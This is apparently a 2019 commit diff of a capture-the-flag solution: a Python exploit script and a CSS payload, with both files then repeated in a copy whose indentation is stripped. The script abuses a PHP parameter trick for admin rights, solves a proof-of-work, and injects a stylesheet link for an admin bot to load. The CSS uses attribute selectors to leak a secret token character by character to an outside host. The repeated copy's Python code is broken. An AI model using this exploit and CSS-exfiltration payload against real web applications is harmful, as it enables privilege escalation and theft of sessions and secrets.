stypr · September 18, 2019 09:56
diff --git a/README.md b/README.md
diff --git a/exploit.py b/exploit.py
 #!/usr/bin/python -u
 #-*- coding: utf-8 -*-

 import os
 import sys
 import time
 import requests
 import hashlib

 r = requests.Session()

 def calc_pow(val):
    ''' calc PoW '''
    i = 0
    s = ""
    while True:
        s = str(i)
        if hashlib.sha1(s).hexdigest()[-5:] == val:
            return s
        i += 1

 def get_perm():
    ''' basically use php trick to escalate privilege '''
    return r.get("http://52.78.192.229/get_perm.php?cred+plain%5B1]=admin").text

 def get_form():
    return r.get("http://52.78.192.229/request.php").text

 def submit_form(title, content, pow):
    files = {'license': open('exploit.css','rb')}
    data = {'prod': title, 'purpose': content, 'pow': pow}
    return r.post("http://52.78.192.229/request.php", files=files, data=data).text

 def view_form(rid):
    return r.get("http://52.78.192.229/view.php?rid=%s" % (rid,)).text

 def send_form(rid):
    t = r.post("http://52.78.192.229/view.php?rid=%s" % (rid,), {'rid': rid}).text
    return t


 if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python exploit.py [flag]")
        exit(-1)

    ''' track.php contains session '''
    search_val = "/track.php?id=" + sys.argv[1]

    ''' write_exploit '''
    css_payload = open("payload.css", "rb").read()
    css_payload = css_payload.replace("{{prev}}", search_val)
    exploit = open("exploit.css", "wb")
    exploit.write(css_payload)
    exploit.close()

    ''' trigger bug to get the privilege '''
    get_perm()

    ''' upload exploit first, get the filename of css '''
    resp_form = get_form()
    resp_form_pow = resp_form.split("=== ")[1].split("<")[0]
    proof_hash = calc_pow(resp_form_pow)
    resp_submit = submit_form("OK", "good~", proof_hash)
    resp_submit_url = resp_submit.split("rid=")[1].split('"')[0]
    resp_view = view_form(resp_submit_url)
    css_filename = resp_view.split('license" src="')[1].split('"')[0]

    ''' upload with the stylesheet tag with previously uploaded css file '''
    resp_form = get_form()
    resp_form_pow = resp_form.split("=== ")[1].split("<")[0]
    proof_hash = calc_pow(resp_form_pow)
    resp_submit = submit_form('<link rel=stylesheet href=%s>' % (css_filename,), 'dummy content', proof_hash)
    resp_submit_url = resp_submit.split("rid=")[1].split('"')[0]
    resp_view = view_form(resp_submit_url)
    css_filename = resp_view.split('license" src="')[1].split('"')[0]

    ''' let admin see it '''
    print(view_form(resp_submit_url))
    print(send_form(resp_submit_url))

    '''
    Use socat to listen, or use http server to wait for flag
    $ python exploit.py "t"
    ...
    $ python exploit.py "th1s1sv3rys3cr3tm4g1c0fc55"
    '''
diff --git a/payload.css b/payload.css
 GIF89a{} img[src^='{{prev}}a'] { background: url('http://harold.kim:1234/leak/a'); }
 img[src^='{{prev}}b'] { background: url('http://harold.kim:1234/leak/b'); }
 img[src^='{{prev}}c'] { background: url('http://harold.kim:1234/leak/c'); }
 img[src^='{{prev}}d'] { background: url('http://harold.kim:1234/leak/d'); }
 img[src^='{{prev}}e'] { background: url('http://harold.kim:1234/leak/e'); }
 img[src^='{{prev}}f'] { background: url('http://harold.kim:1234/leak/f'); }
 img[src^='{{prev}}g'] { background: url('http://harold.kim:1234/leak/g'); }
 img[src^='{{prev}}h'] { background: url('http://harold.kim:1234/leak/h'); }
 img[src^='{{prev}}i'] { background: url('http://harold.kim:1234/leak/i'); }
 img[src^='{{prev}}j'] { background: url('http://harold.kim:1234/leak/j'); }
 img[src^='{{prev}}k'] { background: url('http://harold.kim:1234/leak/k'); }
 img[src^='{{prev}}l'] { background: url('http://harold.kim:1234/leak/l'); }
 img[src^='{{prev}}m'] { background: url('http://harold.kim:1234/leak/m'); }
 img[src^='{{prev}}n'] { background: url('http://harold.kim:1234/leak/n'); }
 img[src^='{{prev}}o'] { background: url('http://harold.kim:1234/leak/o'); }
 img[src^='{{prev}}p'] { background: url('http://harold.kim:1234/leak/p'); }
 img[src^='{{prev}}q'] { background: url('http://harold.kim:1234/leak/q'); }
 img[src^='{{prev}}r'] { background: url('http://harold.kim:1234/leak/r'); }
 img[src^='{{prev}}s'] { background: url('http://harold.kim:1234/leak/s'); }
 img[src^='{{prev}}t'] { background: url('http://harold.kim:1234/leak/t'); }
 img[src^='{{prev}}u'] { background: url('http://harold.kim:1234/leak/u'); }
 img[src^='{{prev}}v'] { background: url('http://harold.kim:1234/leak/v'); }
 img[src^='{{prev}}w'] { background: url('http://harold.kim:1234/leak/w'); }
 img[src^='{{prev}}x'] { background: url('http://harold.kim:1234/leak/x'); }
 img[src^='{{prev}}y'] { background: url('http://harold.kim:1234/leak/y'); }
 img[src^='{{prev}}z'] { background: url('http://harold.kim:1234/leak/z'); }
 img[src^='{{prev}}1'] { background: url('http://harold.kim:1234/leak/1'); }
 img[src^='{{prev}}2'] { background: url('http://harold.kim:1234/leak/2'); }
 img[src^='{{prev}}3'] { background: url('http://harold.kim:1234/leak/3'); }
 img[src^='{{prev}}4'] { background: url('http://harold.kim:1234/leak/4'); }
 img[src^='{{prev}}5'] { background: url('http://harold.kim:1234/leak/5'); }
 img[src^='{{prev}}6'] { background: url('http://harold.kim:1234/leak/6'); }
 img[src^='{{prev}}7'] { background: url('http://harold.kim:1234/leak/7'); }
 img[src^='{{prev}}8'] { background: url('http://harold.kim:1234/leak/8'); }
 img[src^='{{prev}}9'] { background: url('http://harold.kim:1234/leak/9'); }
 img[src^='{{prev}}0'] { background: url('http://harold.kim:1234/leak/0'); }
	#!/usr/bin/python -u
	#-- coding: utf-8 --

	import os
	import sys
	import time
	import requests
	import hashlib

	r = requests.Session()

	def calc_pow(val):
	''' calc PoW '''
	i = 0
	s = ""
	while True:
	s = str(i)
	if hashlib.sha1(s).hexdigest()[-5:] == val:
	return s
	i += 1

	def get_perm():
	''' basically use php trick to escalate privilege '''
	return r.get("http://52.78.192.229/get_perm.php?cred+plain%5B1]=admin").text

	def get_form():
	return r.get("http://52.78.192.229/request.php").text

	def submit_form(title, content, pow):
	files = {'license': open('exploit.css','rb')}
	data = {'prod': title, 'purpose': content, 'pow': pow}
	return r.post("http://52.78.192.229/request.php", files=files, data=data).text

	def view_form(rid):
	return r.get("http://52.78.192.229/view.php?rid=%s" % (rid,)).text

	def send_form(rid):
	t = r.post("http://52.78.192.229/view.php?rid=%s" % (rid,), {'rid': rid}).text
	return t


	if __name__ == "__main__":
	if len(sys.argv) != 2:
	print("Usage: python exploit.py [flag]")
	exit(-1)

	''' track.php contains session '''
	search_val = "/track.php?id=" + sys.argv[1]

	''' write_exploit '''
	css_payload = open("payload.css", "rb").read()
	css_payload = css_payload.replace("{{prev}}", search_val)
	exploit = open("exploit.css", "wb")
	exploit.write(css_payload)
	exploit.close()

	''' trigger bug to get the privilege '''
	get_perm()

	''' upload exploit first, get the filename of css '''
	resp_form = get_form()
	resp_form_pow = resp_form.split("=== ")[1].split("<")[0]
	proof_hash = calc_pow(resp_form_pow)
	resp_submit = submit_form("OK", "good~", proof_hash)
	resp_submit_url = resp_submit.split("rid=")[1].split('"')[0]
	resp_view = view_form(resp_submit_url)
	css_filename = resp_view.split('license" src="')[1].split('"')[0]

	''' upload with the stylesheet tag with previously uploaded css file '''
	resp_form = get_form()
	resp_form_pow = resp_form.split("=== ")[1].split("<")[0]
	proof_hash = calc_pow(resp_form_pow)
	resp_submit = submit_form('<link rel=stylesheet href=%s>' % (css_filename,), 'dummy content', proof_hash)
	resp_submit_url = resp_submit.split("rid=")[1].split('"')[0]
	resp_view = view_form(resp_submit_url)
	css_filename = resp_view.split('license" src="')[1].split('"')[0]

	''' let admin see it '''
	print(view_form(resp_submit_url))
	print(send_form(resp_submit_url))

	'''
	Use socat to listen, or use http server to wait for flag
	$ python exploit.py "t"
	...
	$ python exploit.py "th1s1sv3rys3cr3tm4g1c0fc55"
	'''
	GIF89a{} img[src^='{{prev}}a'] { background: url('http://harold.kim:1234/leak/a'); }
	img[src^='{{prev}}b'] { background: url('http://harold.kim:1234/leak/b'); }
	img[src^='{{prev}}c'] { background: url('http://harold.kim:1234/leak/c'); }
	img[src^='{{prev}}d'] { background: url('http://harold.kim:1234/leak/d'); }
	img[src^='{{prev}}e'] { background: url('http://harold.kim:1234/leak/e'); }
	img[src^='{{prev}}f'] { background: url('http://harold.kim:1234/leak/f'); }
	img[src^='{{prev}}g'] { background: url('http://harold.kim:1234/leak/g'); }
	img[src^='{{prev}}h'] { background: url('http://harold.kim:1234/leak/h'); }
	img[src^='{{prev}}i'] { background: url('http://harold.kim:1234/leak/i'); }
	img[src^='{{prev}}j'] { background: url('http://harold.kim:1234/leak/j'); }
	img[src^='{{prev}}k'] { background: url('http://harold.kim:1234/leak/k'); }
	img[src^='{{prev}}l'] { background: url('http://harold.kim:1234/leak/l'); }
	img[src^='{{prev}}m'] { background: url('http://harold.kim:1234/leak/m'); }
	img[src^='{{prev}}n'] { background: url('http://harold.kim:1234/leak/n'); }
	img[src^='{{prev}}o'] { background: url('http://harold.kim:1234/leak/o'); }
	img[src^='{{prev}}p'] { background: url('http://harold.kim:1234/leak/p'); }
	img[src^='{{prev}}q'] { background: url('http://harold.kim:1234/leak/q'); }
	img[src^='{{prev}}r'] { background: url('http://harold.kim:1234/leak/r'); }
	img[src^='{{prev}}s'] { background: url('http://harold.kim:1234/leak/s'); }
	img[src^='{{prev}}t'] { background: url('http://harold.kim:1234/leak/t'); }
	img[src^='{{prev}}u'] { background: url('http://harold.kim:1234/leak/u'); }
	img[src^='{{prev}}v'] { background: url('http://harold.kim:1234/leak/v'); }
	img[src^='{{prev}}w'] { background: url('http://harold.kim:1234/leak/w'); }
	img[src^='{{prev}}x'] { background: url('http://harold.kim:1234/leak/x'); }
	img[src^='{{prev}}y'] { background: url('http://harold.kim:1234/leak/y'); }
	img[src^='{{prev}}z'] { background: url('http://harold.kim:1234/leak/z'); }
	img[src^='{{prev}}1'] { background: url('http://harold.kim:1234/leak/1'); }
	img[src^='{{prev}}2'] { background: url('http://harold.kim:1234/leak/2'); }
	img[src^='{{prev}}3'] { background: url('http://harold.kim:1234/leak/3'); }
	img[src^='{{prev}}4'] { background: url('http://harold.kim:1234/leak/4'); }
	img[src^='{{prev}}5'] { background: url('http://harold.kim:1234/leak/5'); }
	img[src^='{{prev}}6'] { background: url('http://harold.kim:1234/leak/6'); }
	img[src^='{{prev}}7'] { background: url('http://harold.kim:1234/leak/7'); }
	img[src^='{{prev}}8'] { background: url('http://harold.kim:1234/leak/8'); }
	img[src^='{{prev}}9'] { background: url('http://harold.kim:1234/leak/9'); }
	img[src^='{{prev}}0'] { background: url('http://harold.kim:1234/leak/0'); }